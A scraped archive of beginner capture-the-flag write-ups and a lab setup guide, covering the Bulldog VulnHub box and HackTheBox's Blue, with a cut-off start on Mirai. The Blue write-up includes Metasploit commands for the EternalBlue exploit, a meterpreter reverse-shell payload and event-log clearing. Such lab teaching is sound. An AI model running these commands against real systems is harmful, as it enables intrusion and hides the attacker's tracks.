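Reading strings output from a compiled program takes a little interpretation, so here is an added Python example (mine, not the box binary and not the output of strings on it) of the effect to expect when a program keeps a hard-coded password in its code: a constructed x86-64 byte sequence of the shape compilers emit when they build a string on the stack, 8 bytes per 64-bit move instruction, a strings-style extractor run over it, and a function that recognises the movabs instructions and reassembles their immediates in order. The exact instruction layout is an assumption made for the illustration; the string reuses the password that strings reveals in the next section.

```python
import re


def strings(blob, min_len=4):
    """What the strings tool does: every run of printable ASCII of at least min_len bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def build_stack_string_code(secret):
    """Constructed x86-64 machine code of the shape a compiler emits when it copies a
    string literal onto the stack 8 bytes at a time:
        48 B8 <8 bytes>   movabs rax, imm64
        48 89 45 <disp8>  mov [rbp+disp8], rax
    The NUL terminator is included and the data is padded to a multiple of 8.
    This layout is an assumption for the illustration, not taken from the box binary."""
    data = secret + b"\0"
    data += b"\0" * (-len(data) % 8)
    code = bytearray()
    for offset in range(0, len(data), 8):
        code += b"\x48\xb8" + data[offset:offset + 8]   # movabs rax, imm64
        disp = (offset - len(data)) & 0xFF               # negative rbp offset, one byte
        code += b"\x48\x89\x45" + bytes([disp])          # mov [rbp-N], rax
    code += b"\xc3"                                      # ret
    return bytes(code)


# REX.W (0x48) followed by B8..BF: mov r64, imm64 for rax..rdi. The 8 bytes after
# it are the immediate. (r8..r15 would use the 0x49 prefix; not needed here.)
MOVABS = re.compile(rb"\x48[\xb8-\xbf](.{8})", re.S)


def recover_movabs_string(code):
    """Concatenate the immediates of the movabs instructions in file order and cut
    at the first NUL: the stack string, reassembled."""
    immediates = [m.group(1) for m in MOVABS.finditer(code)]
    return b"".join(immediates).split(b"\0", 1)[0].decode("ascii")


if __name__ == "__main__":
    code = build_stack_string_code(b"SUPERultimatePASSWORDyouCANTget")
    print("strings sees:", " ".join(strings(code)))   # chunks with a stray H on the end
    print("reassembled: ", recover_movabs_string(code))
```

The stray H is the 0x48 REX prefix of the instruction that follows each immediate: it is a printable byte, so strings glues it onto the end of the chunk before the non-printable 0x89 or 0xB8 that comes next breaks the run. Keep that picture in mind while reading the rest of the strings output.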
Also, the note mentioned that the application is only set up to work for the Django user. Could this mean that the password for the Django user is hard-coded into the application itself?\nWe should read the whole file to try to find something. Start with the section we are already looking at.\nHmm, this isn\u0026rsquo;t quite readable but we can make a decent guess out of it.\nSUPERultH imatePASH SWORDyouH CANTget You know, if you dropped those pesky H\u0026rsquo;s at the end, you would find\nSUPERultimatePASSWORDyouCANTget\nCould this be our \u0026ldquo;hidden\u0026rdquo; password?\nLet\u0026rsquo;s try it!\nsudo su\npassword: SUPERultimatePASSWORDyouCANTget\nWe own this box now - we are the top (bull)dog! We have access to all files, can change any passwords, install backdoors, and run amok as we please.\nIf this were a real pentest, we may attempt to cover our tracks or use this box as a staging ground for accessing other machines on a network. A hacker might use this machine to serve their botnet, or as a proxy to commit actions that may be traced back to Bulldog Industries.\nAll we want to do, however, is grab the flag from the /root directory.\ncd /root \u0026amp;\u0026amp; ls cat congrats.txt Conclusion # If you want to get into more CTFs, I recommend Vulnhub and HackTheBox as great platforms.\nVulnhub maintains this list of resources which may serve as your launchpad for all things security.\nCTFs are a fun way of testing your problem solving ability, learning a ton, and developing a skill that can blossom into a new career in cybersecurity. Most importantly, they will help you develop the CTF MINDSET.\nThis mindset is prevalent throughout the pentesting community and will be one of your greatest assets.\nHere are a few pieces of this mindset:\nTry harder - This is the official advice of the OSCP Pentesting Certification Be self-reliant. CTF writeups are one of the ONLY places you will be spoon fed ideas on how to move forward. 
If you approach a community of pentesters without showing your own independent efforts, there is an excellent chance you will simply be shown the door. If you don\u0026rsquo;t know something, learn it. Search online, read some books, watch some tutorials and try again. \u0026ldquo;How is this intended to be used? How can I do something unexpected?\u0026rdquo; \u0026ldquo;What would happen if I\u0026hellip;\u0026rdquo; I hope you had fun capturing your first flag!\n","date":"23 January 2018","externalUrl":null,"permalink":"/archive/your-first-ctf/yourfirstctf-2/","section":"Archive","summary":"Tame the bulldog with your newfound skills!","title":"Your First CTF 2 - Taming the Bulldog","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\n\u0026ldquo;What is a CTF?\u0026rdquo; to Your First Root Flag (2018) # A two part series that can take you from having never heard of CTFs or running Linux to capturing your first root flag in a matter of hours. Turbo-start your CTF Skills!\n","date":"17 January 2018","externalUrl":null,"permalink":"/archive/your-first-ctf/","section":"Archive","summary":"A two part series that can take you from having never heard of CTFs or running Linux to capturing your first root flag in a matter of hours. Turbo-start your CTF Skills!","title":"Series: Your First CTF","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\n1. Background - What are we talking about? # Capture the Flags are intentionally vulnerable systems designed for people to hack into. They contain specially placed vulnerabilities that the attacker has to identify and exploit in order to gain a certain level of access. 
To prove this level of access, a \u0026ldquo;flag\u0026rdquo; file is often placed for the attacker to find.\nThe \u0026ldquo;flag\u0026rdquo; might contain a unique string of characters that prove the attacker has reached their goal, or might just show a congratulatory message. In some instances, the attacker just needs to gain control over the most powerful user on the system. CTFs are created to help people learn skills needed to test real world systems while providing a safe and LEGAL method of doing so.\nShort Legal Caveat: If you want to learn to hack or how to become a penetration tester - use CTFs, not real people\u0026rsquo;s machines. CTFs are designed for you to experiment and play with. It is very difficult to cause any real world harm if you use them properly. Getting a few thrills breaking into real people\u0026rsquo;s systems is not the way to learn.\nONLY PRACTICE TECHNIQUES LEARNED HERE ON SYSTEMS YOU HAVE\nE X P L I C I T\nPERMISSION TO HACK\nA locksmith and a burglar may use the same tools, it is only HOW they are used that separates criminals from respected professionals.\n2. Description - What is this document? # Regardless of what operating system your host OS uses, this guide attempts to take you from \u0026ldquo;What is a CTF?\u0026rdquo; and never running a Linux command in your life to capturing the root flag on a Linux machine in the span of hours.\nOur capture the flag will take the form of a Linux virtual machine that we will be running on our own computers. Since this machine is intended to be vulnerable, we are going to isolate it from as many networks as possible, especially the internet. A competent hacker may be able to gain access to the VM and then \u0026ldquo;jump out\u0026rdquo; to the host (your real computer) to cause all sorts of trouble.\nWe will use the VirtualBox virtualization software, which runs on Windows, Mac and Linux. 
The setup process for each type of operating system is pretty similar, so this document will only cover a general outline.\nThe CTF we will use is Nick Frichette\u0026rsquo;s \u0026ldquo;Bulldog\u0026rdquo; found on VulnHub.com at https://www.vulnhub.com/entry/bulldog-1,211/\nNote: You will be able to find walkthroughs for this box online, but reading them will spoil the learning process for you. Many walkthroughs (including one of my own) assume the reader already has some knowledge of pentesting and Linux, and might only contain the shortest possible path to root. Walkthroughs may show you the fastest route, but it is likely they will not provide much information aimed at the absolute beginner.\nThe pathway we will take might not be the absolute shortest, and may not always follow best practices, but it is beginner friendly and will teach you enough to tame the Bulldog. The tools we will use to accomplish our goal can be found conveniently organized in the Kali Linux distribution.\nKali will run in a virtual machine at the same time as our CTF machine, and we will route all of our attacks through it. Kali can be run natively, but is designed to be easy to run as a virtual machine or live boot. The CTF machine is quite minimal - it does not run a graphical interface of any kind, and can only be accessed via command line. However, running two virtual machines simultaneously may heavily tax some computers. We will be able to adjust our specifications as needed.\nThe virtualization software can run a multitude of operating systems. These OS\u0026rsquo;s are broken into categories that can form a family tree. With Linux as our main branch, we can treat \u0026ldquo;Debian\u0026rdquo; as our next branch, and \u0026ldquo;Kali\u0026rdquo; as the final leaf. Not all Linux-based operating systems are Debian-based, but all Debian-based OS\u0026rsquo;s are Linux. The most popular Debian OS is Ubuntu. 
Kali is a distribution of Debian designed for security usage.\nOur first step is to get Kali up and running.\n3. Setting Up Virtualbox and Kali # While you may already have Virtualization software on your computer, the author of the CTF specifies that this box was designed to be run with VirtualBox. As VBox is my personal choice, I have not troubleshot getting it running using VMWare or any other software. The author has also expressed problems with VMware, so it may be easiest to simply run VBox.\nDownload the Appropriate Virtual Box Files for your OS Here:https://www.virtualbox.org/wiki/Downloads\nVirtualbox also comes with an \u0026ldquo;Extension Pack\u0026rdquo; that provides additional features:http://download.virtualbox.org/virtualbox/5.2.4/Oracle_VM_VirtualBox_Extension_Pack-5.2.4-119785.vbox-extpack\nWe are going to run the 64 bit version of Kali. A lighter, 32-bit version, is available, and might work for our purposes. However, I have not tested it.\nDownload the Kali OVA file - this can be done directly or via torrent. Make sure you download the VirtualBox version of the image, not the VMWare version.\nhttps://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/\nDownload the file from the above link. Torrent is likely fastest. Once VirtualBox is installed and the torrent is complete, run the downloaded .OVA file\nChange the name to something like \u0026ldquo;Kali\u0026rdquo; Set \u0026ldquo;Guest OS Type\u0026rdquo; to \u0026ldquo;Linux -\u0026gt; Debian (64-bit)\u0026rdquo; If you like, you can change the location of the VM\u0026rsquo;s virtual hard disk, as well as the number of CPUs and RAM it will use. Set these parameters to match the specifications of your computer.\nWhen you are ready, click \u0026ldquo;Import\u0026rdquo; and let the VM install. This process will likely take 2-3 minutes. 
Select your newly installed Kali system on the left side of the panel and click the green arrow key labeled \u0026ldquo;Start\u0026rdquo; to boot it up.\nClicking on the window where the VM is running will bring up a prompt asking if you want to \u0026ldquo;Capture\u0026rdquo; your mouse. This means that the mouse will be \u0026ldquo;bounded\u0026rdquo; within the VM Window and able to interact with it. If you want to have your mouse escape the window, press Right-Control on Windows and Linux and Left-Command on Mac. Don\u0026rsquo;t forget this!\nIf your mouse gets \u0026ldquo;trapped\u0026rdquo; in the VM you can free it by pressing:\nThe CTRL Key on the RIGHT SIDE of the keyboard on Windows and Linux The \u0026ldquo;Command\u0026rdquo; key on the LEFT SIDE of a Mac keyboard At the main login screen, enter the default credentials for the OVA\nusername: root password: toor It may come as a surprise to you that we log in with root access. Kali is not designed for general usage like most operating systems; it is specialized for security. It is not meant to host multiple users with different privileges. If you are running Kali, you are the big boss of the system (in this case, our VM) and your word is law.\nThe system will follow your commands and orders to the letter - no matter what.\nRoot access means any properly formatted command will be executed without asking twice, and may be irreversible.\nIf your command tells the system to delete itself, it won\u0026rsquo;t double check if you are sure. The system will just begin to delete.\nOpen up the terminal app from the dock and we will go over some basic Linux operations.\n4. Linux Basics: Users, Permissions and the Command Line # If you know the basics of Linux, feel free to skip this section.\n\u0026ldquo;Why do I have to use the command line? It\u0026rsquo;s the 21st century! Show me some pictures!\nMany tools, including some that we will be using in this CTF have graphical user interfaces. 
While these are often functional, they may end up slowing down productivity as it is very difficult to make a given process occur, say, hundreds of times, by clicking the mouse. When we actually gain access to a machine we are attempting to conquer, it is not going to be through a remote desktop client. We will not be moving a mouse around and clicking icons.\nWe will be gaining access via command line \u0026ldquo;shells\u0026rdquo;. Some of these shells can be quite primitive and can miss many of the features that the terminal on your local machine has by default. Finally, a process that relies on the entry of simple text commands is far easier to document than one that requires blueprints and step by step diagrams.\nWhy use the command line?\nScripting Documentation Remote shells don\u0026rsquo;t have pictures This is a bare bones explanation of Linux. There are many, many core details that it ignores completely. It only explains the minimum needed to conquer the CTF in Part 2.\nLinux File System: # All of the files on a Linux system sprout from the root directory. Most commonly, this directory is simply called / by the system and pronounced \u0026ldquo;root.\u0026rdquo; Directories contain files and subdirectories, which may contain more subdirectories. Subdirectories are given specific purposes that are often standardized across all systems. For example, automatically generated system logs will be saved to the /var/log directory. Files can be read, written to, or executed. But not just anyone can come along and make changes.\nLinux Users: # A Linux system is usually divided into different users. Not all of these users are actual humans, some are employed by the system to execute certain tasks. The average human user has their own \u0026ldquo;home\u0026rdquo; folder, located at /home/username In many cases, this area represents most of the files this user has access to. 
A user may have access to a few select programs, but a well-maintained system will give a user the absolute minimum of permissions necessary to accomplish what they need to. They might not be able to run every command, access every folder and certainly cannot access administrative files.\nLinux Superusers: # An admin user will have more permissions than an average user, and superusers have all the power. Superusers have read and write access to EVERY file. They are able to change the passwords for every user, add users, delete users, and execute any command. If a user needs to gain access to a file they used to not be able to access, an admin will have to come in and change the permissions to that file. On most Linux systems, even admin users don\u0026rsquo;t actively use root all the time. A root user has the power to make very big, irreversible mistakes when dealing with important files.\nOn our Kali system, there is only one user - root. Instead of having a /home directory, the \u0026ldquo;home\u0026rdquo; folder for root is /root. This is easily confused with the / directory. I will differentiate between the two by calling / the \u0026ldquo;system\u0026rdquo; root directory, and /root the \u0026ldquo;user\u0026rdquo; root directory.\nEssential Commands: # To run a command, type it into the command line and press enter. That\u0026rsquo;s it.\nTo interrupt a command while it is running, press CTRL-C\nSome commands are an exception to this rule, but closing the terminal window where the command is running will stop the process. The process can be directly killed, but we don\u0026rsquo;t need to get into that here.\npwd - outputs the current location. 
When we open the terminal application after login, we find ourselves in the user root directory.\nclear - clears the contents of the terminal\nRun it between commands to get a clean slate.\nman - This is the \u0026ldquo;what am I doing?\u0026rdquo; command.\nEvery command here, and every command with the proper documentation will contain a manual page. If you want to see a detailed explanation of what a command has to offer, just type\nman COMMAND and read the documentation\nls - lists the contents of a directory\nls -a shows ALL directory contents, included those normally hidden\nls -l shows the ownership/permissions of each file in the directory\nThere are many more flags to the ls command, all of which can be combined.\nls -la is enough for our purposes.\nls run with no directory specified shows the contents of the current directory, but it will show the contents of a specified directory if given one. Try ls / to see the contents of the system root directory.\nmkdir - \u0026ldquo;make directory\u0026rdquo;\nJust specify the name of the directory.\nmkdir a_folder creates a subdirectory of our current directory called a_folder\nLet\u0026rsquo;s make another, called b_folder as well.\ncd - \u0026ldquo;change directory\u0026rdquo; takes you to the directory you point it to.\nWe can use our directory synonyms here.\n~ = user\u0026rsquo;s home folder / = system root .. = one folder above the current directory cd a_folder\nThese synonyms can be used in paths as well. In this case, the following three commands all do the same thing:\ncd /root/b_folder cd ~/b_folder cd ../b_folder /root and ~ are the same when the current user is root, since ~ refers to the current user\u0026rsquo;s home folder.\n.. refers to a relative location, not a full path. It will only jump out one directory. If we had gone one level deeper, into a subdirectory of b_folder, .. would refer to b_folder, not /root.\necho - this command is used to send text to the terminal output. 
This string will always end with a newline.\ncat - \u0026ldquo;concatenate\u0026rdquo; - used to read files\nWe will use these two commands to demonstrate some important things about input and output.\necho \u0026quot;hi\u0026quot; - will send the word \u0026ldquo;hi\u0026rdquo; to the terminal output.\necho \u0026quot;hi\u0026quot; \u0026gt; hi.txt - will save the word \u0026ldquo;hi\u0026rdquo; to a file called hi.txt\ncat hi.txt - will display the contents of hi.txt to the terminal output.\necho \u0026quot;hello\u0026quot; \u0026gt; hi.txt - will OVERWRITE hi.txt to contain \u0026ldquo;hello\u0026rdquo;\necho \u0026quot;hello\u0026quot; \u0026gt;\u0026gt; hi.txt - will ADD \u0026ldquo;hello\u0026rdquo; to the end of hi.txt without disturbing the older lines.\ncat \u0026gt;\u0026gt; file.txt - will add each line you type in to a file called file.txt\nto exit this, press CTRL-D\ncat file.txt hi.txt - will display both files sandwiched together to the terminal output cat file.txt hi.txt \u0026gt; bigfile.txt - will write the contents of file.txt with the contents of hi.txt tacked on to the end into a new file called bigfile.txt rm - \u0026ldquo;remove\u0026rdquo; - used to delete files and folders.\nrm cannot be undone easily. Don\u0026rsquo;t be sorry, be careful.\nThe file is not moved to a trash folder, it is gone. It can be retrieved for a short while using forensics tools, but once you delete something - or edit it, for that matter - it pretty much stays that way.\nrm FILE_NAME - will delete a file rm -r DIRECTORY_NAME - can be used to delete a directory and all its contents, including all the contents of subdirectories within subdirectories. This is known as deleting things recursively. rm * - deletes ALL files in the current directory, but not directories or the files within them. rm -r * - deletes ALL files and subdirectories in the current directory, recursively. 
The * operator is not unique to rm It can be used as a wildcard to \u0026ldquo;fill in the blanks\u0026rdquo; in many contexts. Here we can use it to read files with something common in their name. See the example pictured below.\nless - this command is used to read a file bit by bit, instead of reading the whole thing and skipping right to the end.\nTo properly demonstrate this, we will need a long file.\nLuckily, Kali comes with wordlists pre-installed for password recovery and other bruteforcing methods.\nless /usr/share/wordlists/dirb/common.txt\nThis command allows us to scroll through the wordlist a block at a time. Use the arrow keys or scroll wheel to move around the file, and press the Q key to exit.\nUse the Q key to exit from less\nless can be applied to any output using the | character, called \u0026ldquo;pipe.\u0026rdquo;\nIf you ran ls -la in the system root, the output wouldn\u0026rsquo;t fit in a single terminal window. You can use less in order to scroll through them all.\nls -la / | less Pipe | is used to\u0026hellip; pipe any output in the terminal output to a location of your choosing. 
This is very useful when combined with the tee command, which will allow the output to be displayed and logged simultaneously.\nMany programs have a built in logging option, but a quick (and sometimes inferior) logging option is to use\nCOMMAND | tee log.txt\nwhich pipes the output to a log.txt file while displaying it to the terminal output.\nNote that in some instances we could use\nCOMMAND \u0026gt;\u0026gt; log_file.txt\nbut that will not show us the terminal output in real time, just save it to the log file.\nid - this simple command tells us about the current user.\nThis might not seem all that useful now, but when we get into the CTF it can be very useful for gathering information.\n\u0026amp;\u0026amp; and ; - place these after a command to run multiple commands in a series.\n\u0026amp;\u0026amp; - run the command after the \u0026amp;\u0026amp;\u0026rsquo;s only if the command before doesn\u0026rsquo;t have an error. ; - run the command after the semicolon - no matter what. Either method can be used with any number of commands in a row.\npwd; ls - will output our current directory and its contents.\ncd c_folder \u0026amp;\u0026amp; ls - will only run ls if we successfully enter c_folder. If c_folder does not exist, ls will not run.\nEssential Terminal Shortcuts: # Tab Key - used to auto-complete a command. It can guess what file/directory you will type if you give it the first few letters Try typing ls /ro and then press TAB instead of enter, it will autocomplete to ls /root - then press enter.\nUp and Down Arrow Keys - the terminal \u0026ldquo;remembers\u0026rdquo; the commands you type in. If you press the up arrow, it will fill in the last command you entered. Keep pressing it to go back further in your history. If you go past the command you wanted to use, use the down key to go the other way.\nThere are way too many commands to go over here, and they can be combined and twisted and modified to do all kinds of things. 
You won\u0026rsquo;t need them all for our CTF, but you WILL need to have a basic understanding of:\nThe Basics of the file system The basics of users and permissions ls, cd, cat, |, \u0026amp;\u0026amp; We will be running most of our penetration testing commands from the terminal itself, but they can be explained in context.\n5. Update the Kali VM # If your host machine has internet access, Kali should be connected to the internet as well. You can check this by pinging a website.\nping google.com\nIf you are not connected to the internet, you may need to do some troubleshooting on your own. This problem can happen from time to time and this page is a good place to start looking for how to fix it.\nAs a Debian-based Distro, Kali uses the apt package manager. Instead of having to download installers and update individual applications and features manually, we can use apt to get our system up to speed with just one line.\napt-get update \u0026amp;\u0026amp; apt-get upgrade\nThis will start a long updating process that can take half an hour or so. During that time, it may ask you to confirm some changes. Go with yes, or the default option for each one. Specific parameters can be changed later, and we will not need to alter these to do our CTF.\nThe \u0026ldquo;update\u0026rdquo; portion checks the trusted Kali software repositories for the newest versions, and the \u0026ldquo;upgrade\u0026rdquo; portion upgrades the parts of your system that need to be updated.\nYou might be wondering - can I skip this step? The answer to that question is \u0026ldquo;You shouldn\u0026rsquo;t.\u0026rdquo;\nWhen dealing with cybersecurity, it pays to be up to date. In 2017, a patch for the bug that allowed the WannaCry ransomware to spread was released WELL before the outbreak of the malware. Updated machines were simply not vulnerable to the exploit needed for WannaCry to work as intended. Software has bugs, and most found bugs are patched away. 
There is no magic armor to protect you from all threats, and sometimes patches themselves are not perfect, but keeping your systems up to date may be THE most effective step you can take to protect your systems.\n\u0026ldquo;But why update my ATTACKING VM?\u0026rdquo;\nFrom a practical perspective, any problems that may arise while following along with the CTF instructions in part 2 may be related to software versions. I will update, and by updating, you ensure that we are on the same page.\nUpdating the Kali VM May Annoy Your Host System’s Antivirus: # Funnily enough, antivirus may detect that someone (you) is installing software that can be used maliciously on your computer! Good job, I guess? Look up how to whitelist the files/process in your AV\u0026rsquo;s documentation.\n6. Setting Up the Bulldog CTF VM # We can set up the Bulldog OVA in the same manner that we set up the Kali OVA. If you double click the OVA file, it will likely open a second instance of VirtualBox if you still have it open from Kali.\nJust go to File -\u0026gt; Import Appliance, and select the Bulldog OVA.\nThis OVA comes with default settings practically ready to go, so just load it up and press \u0026ldquo;Import\u0026rdquo; if you are happy with where it will be stored on your machine.\n\u0026hellip;BUT DON\u0026rsquo;T GO BOOTING BULLDOG JUST YET! # In order to isolate/connect the VM\u0026rsquo;s to each other, you will need to change their virtual network adapters to be connected to the host-only network. This disconnects the VM\u0026rsquo;s from the internet, and makes it so they can only \u0026ldquo;see\u0026rdquo; the host machine and each other. If we wanted to, we could keep the Kali machine connected to the internet, but for the sake of uniformity, I chose to make both machines host-only.\nClick on the yellow \u0026ldquo;Settings\u0026rdquo; gear with one of the boxes selected. 
Then select the \u0026ldquo;Network\u0026rdquo; section, and in the \u0026ldquo;Attached To:\u0026rdquo; dropdown menu, select \u0026ldquo;Host-only Adapter\u0026rdquo;\nDo this for both boxes, and we will be ready to go! If you boot up Bulldog, you will not be able to log in. That is because you have to HACK in. Most CTFs are not designed for you to log in normally, we are going to have to create ourselves an alternative method of entry.\nBoot up Bulldog. After some setup, you should see a screen like this:\nThe IP address should be on the same network as the Kali box - by default this will be 192.168.56.xx If you see that, you are all ready to go!\nIf you don\u0026rsquo;t see something like the image above, check your installation steps again.\nA Quick Note About Networking VMs - it is often annoying: # This process will work for Bulldog, since it seems to be set up for Host-Only Networking via Virtualbox.\nNot every CTF VM you try will work with this process. Some VM\u0026rsquo;s are meant to be connected via bridged mode, some via NAT.\nOthers take more naturally to VMWare than VirtualBox. You may need to employ some trial and error for other boxes.\nYou are ready to move on to Part Two!\n","date":"17 January 2018","externalUrl":null,"permalink":"/archive/your-first-ctf/yourfirstctf-1/","section":"Archive","summary":"Get your first hacking lab running! Walk through setting up virtual machines, connecting them, and prepping your tools. No experience needed!","title":"Your First CTF 1 - Intro and Setup","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # This write-up is broken into two sections: The process I used when I first solved this box, and my current process. Treat part 1 as optional.\nBlue was my VERY FIRST Capture the flag, and will always be one I remember. 
With no experience and minimal knowledge of Kali, I solved it using GUI tools, educated guesses and lots of clicking around.\nThis box serves as a showcase for what might have been the most widely known vulnerability of 2017. It isn\u0026rsquo;t the most challenging, especially with context, and might be good as your first CTF, as it was mine.\nPart 2 is written with the idea that the reader has beginner knowledge of pentesting, or at least a basic idea of how Metasploit and nmap work. I used Kali, but the tools are available for other distros and come packaged with most pentesting OS\u0026rsquo;s like BlackArch. It details the process I would use today had I been attempting the CTF for the first time.\nPart 1 is written more like a rambling blog post detailing my mindset and process from when I first attempted it. It might use fewer steps than my current process, but that is because I found the box\u0026rsquo;s name to be a clue big enough to shut down the British NHS.\nPart 1 - The Newbie Process # I\u0026rsquo;d been running Kali for a while, but had been using it to edit text files and get familiar with the command line - no pentesting at all. I had weaseled my way into a Hack The Box invite code, but had never even run nmap before. Perhaps it was time to try these \u0026ldquo;Capture the Flags\u0026rdquo; for real. Armed with Kali and all the searches the internet could provide me, I logged on to HackTheBox and went to see if I could make sense of anything I saw.\nThere were some IP addresses and difficulty ratings, but nothing caught my eye as a place to start. With no idea what else to do, I attempted to place this list of machines into context.\nBy paying attention to Cybersecurity news (mostly by listening to the Cyberwire podcast) I had learned some interesting terms and concepts, but had no context or practical knowledge. The big cybersecurity stories of the year so far had been WannaCry and NotPetya. 
I knew WannaCry was a huge ransomware attack that was infecting Windows server machines all over the world, despite a well-known patch that had been released. Hospitals had to divert ambulances, businesses had to shut down, and some conniving crooks out there were raking in the big bucks $300 in Bitcoin at a time.\nThese attacks were particularly noteworthy because of the vulnerability they exploited. CVE-2017-0144 came to light after it was published by a group known as the Shadow Brokers. They claimed to have stolen an exploit that took advantage of this vulnerability from the \u0026ldquo;Equation Group,\u0026rdquo; which is widely believed to be the United States National Security Agency.\nThis secret weapon had been stolen from a government cyber-armory and was placed into the hands of hackers all over the world. Patches were released in March, but not enough systems had employed them before WannaCry burst on to the scene in May. The exploit used in the attack was commonly known as \u0026ldquo;EternalBlue.\u0026rdquo;\nThis is what I knew about EternalBlue at the time I sat down at HTB for the first time:\nIt affected certain Windows machines (Which ones? Who knew?) It was called EternalBlue That\u0026rsquo;s it. I had no idea what services it exploited and couldn\u0026rsquo;t recall what access it granted.\nWith this information bouncing around inside my head somewhere, I looked for the CTFs with the lowest difficulty ratings. Something clicked in my head when I saw this:\nBlue + Windows + (current year = 2017) + Easy = This machine must crack under EternalBlue!\nOf course! This information was sure to carry me to the legendary flag I had heard needed to be captured. I just needed to implement my strategy and it would be mine.\nHowever, my grand revelation had not provided me an idea of what to actually do. So, I began clicking around on Kali to get my bearings and looking for some kind of lead. 
In the default applications dock was Armitage, and I looked it up online to find out it was a graphical front end for Metasploit. I had heard Metasploit was very effective, but had no idea what it looked like or how it was operated. I wondered, \u0026ldquo;if this Metasploit is so useful, surely I should be able to use it to wield EternalBlue?\u0026rdquo;\nMetasploit was a mystery, but I did know how to look at graphics. Armitage seemed to be a good place to start. I clicked all the default options upon startup and I found myself looking at some folders, an empty void and a console. After browsing through the options at the top of the page, I decided I might need to add a target. I went to \u0026ldquo;Hosts\u0026rdquo; and selected \u0026ldquo;Add Hosts.\u0026rdquo;\nI supposed I needed to enter \u0026ldquo;10.10.10.40\u0026rdquo; - the box IP\nI now had a monitor icon representing a machine. I noticed there was a search box under the folders, so I went ahead and entered \u0026ldquo;blue\u0026rdquo;\nThat last result looked very promising! I didn\u0026rsquo;t know any other name for the exploit besides \u0026ldquo;EternalBlue,\u0026rdquo; but the fact that there was a \u0026ldquo;17\u0026rdquo; in the title suggested this was the exploit I needed. I clicked on the \u0026ldquo;target\u0026rdquo; machine, then on the eternalblue line. An options Window came up, but I didn\u0026rsquo;t know how to interpret any of those options, so I just hit enter. The console buzzed to life, and the machine\u0026rsquo;s icon changed.\nIt turned red! There was lightning! I MUST be a hacker now. Had I just used an NSA secret weapon? Woooooaaaaaaaah.\nI didn\u0026rsquo;t know how to move forward, so I attempted my tried and true method: clicking on things until something happened. 
I struck gold when I right-clicked the box icon and saw the \u0026ldquo;Interact\u0026rdquo; option - a Windows command line appeared in the bottom console.\nAt this time, I could stumble around the Linux command line with some effectiveness, but in Windows I was fumbling around in the dark. All I knew was cd and dir, which proved to be just barely enough to get around, albeit slowly.\ncd .. cd .. dir cd Users dir I knew that I had to capture the \u0026ldquo;System\u0026rdquo; and \u0026ldquo;User\u0026rdquo; flags - so I assumed \u0026ldquo;haris\u0026rdquo; was the user, and \u0026ldquo;Administrator\u0026rdquo; was the path that led to the system flag.\ncd Administrator cd Desktop dir At this point, I knew I had to read the file, but cat didn\u0026rsquo;t work! My Windows command line knowledge had been depleted! A quick online search led me to type and my first flag was captured!\ntype root.txt.txt It was very exciting, and I immediately set out on the next boxes, stumbling along into new knowledge.\nPart 2 - A More Current Strategy # It hasn\u0026rsquo;t been very long since I captured that flag the first time, but my process has changed dramatically. That time has been spent learning and practicing, and I have even developed something of a methodology. Here is how I would attempt the box today, with a bit more experience under my belt.\n\u0026ldquo;Blue\u0026rdquo; still provides some context, but HackTheBox boxes don\u0026rsquo;t provide an exceptionally high amount of information ahead of time. A good scan is in order.\nnmap -sV -F -T4 10.10.10.40 -oA nmap_fast_scan\nMost of the CTFs I have done so far revolve around a HTTP port, and aren\u0026rsquo;t Windows machines, so I am a bit out of my element. 
I should try to get more information - some deeper nmap scanning should help with this.\nnmap -sV -sC --script=vuln 10.10.10.40 -oA nmap_fullscan_blue\nWhile this is running, I\u0026rsquo;ll search for some information about possible vulnerabilities based on the information I do have.\nI tried Findsploit, but didn\u0026rsquo;t find anything too interesting. These ports are pretty unfamiliar to me, so I\u0026rsquo;ll do some research about what I am dealing with. Research on the rpc port reminds me that I can use the enum4linux tool.\nenum4linux 10.10.10.40\nThis command mostly informed me that the scanned ports were off-limits. It doesn\u0026rsquo;t seem like a way to move forward. The same was true for nbtscan and smbmap.\nWithout the context of \u0026ldquo;Blue\u0026rdquo; - this box didn\u0026rsquo;t provide me much I recognized. Even though I did know that the box was named Blue, I decided to pretend that I had never heard of the exploit I knew I needed. This way I can test my process and see if I would \u0026ldquo;discover\u0026rdquo; the exploit I needed.\nWhile I had been searching for information about the ports and not finding anything to grab on to, nmap finished the deeper scan. It produced a very, very interesting result.\nWhat is this mysterious \u0026ldquo;ms17-010\u0026rdquo; of which it speaks? Maybe Findsploit has something about this? Remote Code Execution is exactly what I\u0026rsquo;d like to have.\nHow convenient: Metasploit has both a scanning and exploitation module for this vulnerability.\nmsfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 10.10.10.40 run The scanning module reports that we have a decent chance of success if we run the exploit, so let\u0026rsquo;s do it.\n* use exploit/windows/smb/ms17_010_eternalblue\n\u0026ldquo;EternalBlue,\u0026rdquo; eh? Maybe that is how the box got its name. Hmm\u0026hellip;\nshow options\nAs of this writing, I am still pretty green when it comes to the Windows command line. 
To circumvent this issue, let\u0026rsquo;s make sure our payload is Meterpreter.\nset PAYLOAD windows/x64/meterpreter/reverse_tcp\nMake sure your Meterpreter IP is set to your HTB VPN IP\nset LHOST 10.10.14.10 set RHOST 10.10.10.40 run Once again, it is just really cool to know that you\u0026rsquo;ve used an NSA cyberweapon!\ngetuid getuid tells us we are the boss of this system, and can go ahead and grab whatever flags we wish.\ncd /Users/Administrator/Desktop ls cat root.txt.txt ls /Users haris appears to be the name of our flag-holding user.\ncd /Users/haris/Desktop ls cat user.txt.txt Now, all that is left to do is clean up using the built-in meterpreter methods.\nclearev Thanks to HackTheBox for making such an approachable and timely CTF!\n","date":"12 January 2018","externalUrl":null,"permalink":"/archive/ctf-writeups/blue-htb/","section":"Archive","summary":"","title":"CTF Writeup: Blue on HackTheBox","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # Mirai on HackTheBox highlights a fundamental truth about penetration testing that sounds laughably obvious:\nPentesting usually requires operating a computer.\nIt sounds silly, but when I was was a complete beginner, the system management aspects of pentesting simply were not on my radar. I had expected pentesting to be all exploitation modules and reverse shells. We run hack_the_root.exe, some sinister-looking ASCII art comes up on the screen, maybe run a command or two, and 